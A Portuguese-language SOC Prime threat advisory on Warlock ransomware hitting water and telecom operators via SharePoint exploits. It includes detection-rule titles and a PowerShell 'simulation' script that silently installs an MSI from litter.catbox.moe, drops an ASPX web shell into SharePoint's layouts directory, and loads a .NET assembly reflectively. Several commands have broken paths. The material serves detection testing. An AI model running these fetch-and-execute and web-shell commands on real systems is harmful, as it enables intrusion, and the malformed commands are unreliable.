SOC Prime Bias: Critical

05 Oct 2026 17:09 UTC

Warlock Ransomware Ataca Infraestrutura Crítica de Água e Telecomunicações

Author Photo
SOC Prime Team linkedin icon Seguir
Warlock Ransomware Ataca Infraestrutura Crítica de Água e Telecomunicações
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Um ator de ameaça com ligação à China, rastreado como Longlegs, está implantando o ransomware Warlock explorando vulnerabilidades do Microsoft SharePoint. O grupo usa uma cadeia de exploração ToolShell para acesso inicial antes de se mover lateralmente por redes comprometidas. Os atacantes também aplicam técnicas avançadas de evasão, incluindo o abuso de drivers vulneráveis para desativar software de segurança e aproveitam serviços de nuvem legítimos para entrega de carga útil.

Investigação

A investigação rastreou atividades desde a exploração inicial do SharePoint até a implantação de um webshell no diretório LAYOUTS. Analistas observaram chaves de máquina ASP.NET falsificadas sendo usadas para execução remota de código e ransomware preparado no compartilhamento SYSVOL para distribuição em todo o domínio. A cadeia de ataque também envolveu carregamento de DLLs e abuso da funcionalidade de tunelamento do Visual Studio Code para acesso persistente.

Mitigação

As organizações devem priorizar a aplicação de patches no Microsoft SharePoint Server para remediar vulnerabilidades conhecidas do ToolShell. A aplicação de controles rigorosos sobre drivers assinados, mas vulneráveis, pode ajudar a prevenir ataques BYOVD. As equipes de segurança também devem monitorar o uso anômalo de ferramentas de ‘living-off-the-land’ e restringir o acesso ao compartilhamento SYSVOL para atividades não administrativas para reduzir a movimentação lateral e a implantação de ransomware.

Resposta

Quando atividades maliciosas são detectadas, os respondedores a incidentes devem isolar os servidores SharePoint afetados e inspecionar o compartilhamento SYSVOL em busca de scripts ou binários não autorizados. Realize uma auditoria abrangente das contas de domínio, com foco em adições não autorizadas ao grupo local de Administradores. Reveja o tráfego de rede para conexões de saída para serviços de compartilhamento de arquivos, como catbox.moe ou wasabisys.com usados para preparação de carga útil.

Fluxo de Ataque

Detecções

Adicionar Usuário aos Administradores Locais (via cmdline)

Equipe SOC Prime
05 Out 2026

Download ou Upload via Powershell (via cmdline)

Equipe SOC Prime
05 Out 2026

Strings Powershell Suspeitas (via cmdline)

Equipe SOC Prime
05 Out 2026

Chamar Classes/Métodos .NET Suspeitos a partir do CommandLine do Powershell (via process_creation)

Equipe SOC Prime
05 Out 2026

Possível Descoberta de Compartilhamentos de Rede (via cmdline)

Equipe SOC Prime
05 Out 2026

Descoberta de Confianças de Domínio Suspeitas (via cmdline)

Equipe SOC Prime
05 Out 2026

Possível Tentativa de Instalação de Arquivo MSI Remoto (via cmdline)

Equipe SOC Prime
05 Out 2026

Execução Suspeita a partir do Perfil de Usuário Público (via process_creation)

Equipe SOC Prime
05 Out 2026

Strings Powershell Suspeitas (via powershell)

Equipe SOC Prime
05 Out 2026

Chamar Métodos .NET Suspeitos a partir do Powershell (via powershell)

Equipe SOC Prime
05 Out 2026

Possível Criação de Webshell em Diretórios do Microsoft Exchange/Sharepoint (via file_event)

Equipe SOC Prime
05 Out 2026

Arquivos Suspeitos no Perfil de Usuário Público (via file_event)

Equipe SOC Prime
05 Out 2026

Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)

Equipe SOC Prime
05 Out 2026

Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via dns)

Equipe SOC Prime
05 Out 2026

Comando e Controle Suspeito por Solicitação para Domínio de Interações Fora-de-Banda (via dns)

Equipe SOC Prime
05 Out 2026

IOCs (HashSha256) para detectar: Ransomware Warlock Ataca Operadoras de Água e Telecomunicações

Regras de IA SOC Prime
05 Out 2026

Detecção de Comando Malicioso do PowerShell para Execução de Código [Windows Powershell]

Regras de IA SOC Prime
05 Out 2026

Preparação e Execução de Ransomware Warlock via Compartilhamentos de Rede [Windows File Event]

Regras de IA SOC Prime
05 Out 2026

Indicadores de Ransomware Warlock em Servidores SharePoint [Windows Process Creation]

Regras de IA SOC Prime
05 Out 2026

Execução de Simulação

Pré-requisito: A Verificação de Telemetria e Linha de Base Pre-flight deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa do Ataque e Comandos: O adversário visa implantar o ransomware Warlock em um servidor SharePoint. O ataque começa com o uso de msiexec para obter um MSI malicioso de um domínio remoto controlado por atacantes (catbox.moe). Após o acesso inicial, o atacante usa o PowerShell para gravar um web shell ASPX malicioso no SharePoint layout2sp.aspx usando uma carga útil codificada em Base64 para contornar filtros simples de string. Finalmente, o atacante tenta carregar um assembly .NET malicioso diretamente na memória usando System.Workflow.ComponentModel para executar código sem deixar vestígios no disco.

  • Script de Teste de Regressão:

    # Script de Simulação de Ransomware Warlock
    # NOTA: Este script é apenas para fins de teste autorizados.
    
    Write-Host "[!] Iniciando Simulação de Ransomware Warlock..." -ForegroundColor Red
    
    # 1. Simular Download Remoto do MSIEXEC (Seleção 3)
    Write-Host "[*] Simulando download de carga útil remota do MSIEXEC..."
    Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue
    
    # 2. Simular Queda do Web Shell ASPX pelo PowerShell (Seleção 1)
    # Usamos a string exata da regra para garantir a detecção
    Write-Host "[*] Simulando queda do web shell pelo PowerShell via Base64..."
    $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"""
    Invoke-Expression $cmd1
    
    # 3. Simular Carregamento de Assembly Refletivo (Seleção 2)
    Write-Host "[*] Simulando Carregamento de Assembly Refletivo..."
    $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel"
    Invoke-Expression $cmd2
    
    Write-Host "[+] Comandos de simulação enviados." -ForegroundColor Green
  • Comandos de Limpeza:

    # Script de limpeza para remover qualquer artefato criado durante a simulação
    Write-Host "[!] Limpando artefatos da simulação..." -ForegroundColor Yellow
    
    # Remover arquivos simulados (Nota: Em um teste real, você miraria nos caminhos específicos criados)
    # Como usamos strings fictícias, principalmente garantimos que nenhum arquivo malicioso verdadeiro foi solto.
    Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "[+] Limpeza concluída." -ForegroundColor Green